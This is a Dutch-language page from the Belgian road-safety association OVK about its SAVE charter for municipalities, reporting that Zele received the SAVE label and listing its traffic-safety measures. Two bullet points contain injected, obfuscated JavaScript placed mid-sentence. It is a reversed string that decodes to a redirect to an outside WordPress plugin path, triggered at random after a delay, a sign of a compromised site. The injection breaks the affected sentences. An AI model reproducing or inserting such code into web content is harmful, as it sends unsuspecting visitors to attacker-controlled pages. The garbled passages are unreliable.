Met het SAVE-Charter Steden & Gemeenten wil de vzw Ouders van Verongelukte Kinderen (OVK) de Belgische steden en gemeenten betrekken bij haar strijd tegen de (nog steeds) te grote verkeersonveiligheid in ons land.

Op deze website vindt u meer informatie over het SAVE-charter. Daarnaast is er ook verdere informatie terug te vinden over OVK en haar werking.

Zele ontvangt SAVE-label

Op 12 juli ontving Zele als 4e in Oost-Vlaanderen (eerder al Wetteren, Sint-Niklaas en Laarne) het SAVE-label. De uitreiking vond plaats tijdens het slotmoment van hun jaarlijkse verkeerswedstrijd.

Deze gemeentelijke verkeerswedstrijd is een project waar ieder jaar zo’n 450 leerlingen van het vierde, vijfde en zesde leerjaar aan deelnemen. Het bestaat uit twee delen: een theoretisch en een praktisch gedeelte. Een theoriedeel maakt een schifting zodat 220 overblijvers nog kunnen deelnemen aan een praktijkproef. Na de praktijkproef blijven er in 4, 5 en 6 nog telkens 30 prijswinnaars over.

De gemeente Zele werkte tijdens hun actiejaar onder andere aan:

  • Het uitbreiden van de werking van de technische verkeerscommissie. Rijscholen kunnen vrijblijvend opmerkingen verstrekken.
  • Betere signalisatie lange afstandsfietspaden. Thermoplasten die moeten duidelijk maken dat fietsers geen voorrang hebben. Poorteffecten waar die mogelijk zijn.
  • Optimalisering strooiplan fietspaden en algemeen reinigen van fietspaden. De gemeente kocht hier in eigen beheer een gloednieuw toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toestel aan.
  • Het definitief ontwerp afrittencomplex E17/N47 werd door de kwaliteitscontroleur goedgekeurd. Er komt een volledig afgescheiden dubbelrichtingsfietspad vanaf Lokerenbaan toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot in Lokeren. AWV (Afdeling Wegen Vlaanderen) kan vanaf 2016 dit dossier realiseren.
  • In de omgeving van de Pius X-bassischool werd veiliger gemaakt door een verhoogd afgescheiden fietspad. Vanaf 2016 wordt bij de wegeniswerken Avermaat/Meerskant een volledig nieuwe schoolomgeving gerealiseerd en komen ook hier op dit traject, verhoogde en afgescheiden fietspaden.
  • Er werd een elektrische fiets aangekocht voor het gemeentepersoneel.
  • In samenwerking met politie, dienst verkeer & mobiliteit en stadswachten werd begin dit jaar een grondige en grote actie gehouden rond de donkere periode en de zichtbaarheid “actie fluo”.

© 2012 O.V.K. vzw - Léon Theodorstraat 85, 1090 Brussel - Tel: 02/427.75.00 - info@ovk.be